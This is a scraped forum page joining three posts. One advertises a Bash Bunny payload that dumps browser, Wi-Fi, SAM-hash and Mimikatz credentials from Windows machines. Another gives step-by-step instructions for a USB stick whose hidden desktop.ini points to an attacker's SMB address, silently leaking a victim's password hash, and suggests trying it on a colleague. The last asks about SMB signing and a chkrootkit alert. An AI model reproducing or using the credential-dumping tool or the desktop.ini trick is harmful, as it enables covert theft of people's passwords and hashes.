Search the Community

DumpCreds 2.0 Author: QDBA Version: Version 2.0.2 Target: Windows Description Dumps the usernames & plaintext passwords from Browsers (Crome, IE, FireFox) Wifi SAM Hashes Mimimk@tz Dump [new] Computerinformition ( Hardware, Softwarelist, Hotfixes, ProuctKey, Users...) without Use of USB Storage (Because USB Storage ist mostly blocked by USBGuard or DriveLock) Internet connection (becaus Firewall ContentFilter Blocks the download sites) Configuration None needed. Requirements Impacket must be installed. Install it from tools_installer payload https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/tools_installer STATUS LED ----------------------- Status -------------------------------------------------------------- White Give drivers some time for installation Red Blink Fast Impacket not found Red Blink Slow Target did not acquire IP address Amber Blink Fast Initialization Amber HID Stage Purple Blink Fast Wait for IP coming up Purple Blink Slow Wait for Handshake (SMBServer Coming up) Purple / Amber Powershell scripts running RED Error in Powershell Scripts Green Finished Download https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/DumpCreds_2.0 ToDo paralellize Creds gathering with PS while Bashbunny is waiting for Target finished the script it can do some other nice work. i.e. nmap the target. (Not very usefull at the moment, because I'm Admin on Target Host) remove the modifications of the Powersploit scripts, so you can download and use the original Files. (At the moment you must use my scripts) Not Possible at the moment put some version information into the sourcecode and the output file rewrite some code of the payload so the payload will work no matter if you have admin rights (UAC MsgBox) or not (Credentials MsgBox) Maybe! If Target is in a AD Domain and Mimik@tz give us some Passwords try to get some more information about the AD Domain Credits to...... https://github.com/sekirkity/BrowserGather Get-ChromeCreds.ps1 https://github.com/EmpireProject/Empire Get-FoxDump.ps1, Invoke-M1m1k@tz.ps1, Invoke-PowerDump.ps1

Localized SMB Powershell delivery. For when USB and Web methods are disabled or too noisy. https://github.com/hak5/bashbunny-payloads/pull/172

After watching the recent episode of Hak5 (2102) on Youtube, I was wondering if this smb hash grab method can be done without the duck and with a normal USB stick. The answer is YES. Bytewolf @kingbytewolf -= HowTo do it =- Grab any USB-Stick you have laying around Create a Directory Set the System attribute of this directory with attrib +s <dirname> Create a file called desktop.ini in this directory with the following content [.ShellClassInfo] IconResource=\\<YourIP>\tmp\demo.ico IconFile=%SystemRoot%\system32\shell32.dll IconIndex=-235 Save the desktop.ini as Unicode or UTF-8 file Set the attributes archive, hidden and system with attrib +a +h +s desktop.ini Preparation -> Done Put some RFCs in the directory. Fire up the smbserver and give the Stick to your colleague that really needs these RFCs. >:-D When he navigates to the drive you should have the hash delivered to your doorstep without any windows popping up.

Have two questions: 1)I have tried run the smbsign --force command however have been unsuccessful. Host script results:| smb-security-mode:| Account that was used for smb scripts: guest| User-level authentication| SMB Security: Challenge/response passwords supported|_ Message signing disabled (dangerous, but default)|_smbv2-enabled: Server doesn't support SMBv2 protocolIs there a command line that I can enable message signing?2)I run chkrootkit on my Ubuntu Desktop machine:Checking `chkutmp'... The tty ofthe following user process(es) were not found in /var/run/utmp !! RUID PID TTY CMD! root 1637 tty7 /usr/bin/X -core :0 -seat seat0 -auth/var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitchchkutmp: nothing deletedSearching for Suckit rootkit... Warning:/sbin/init INFECTED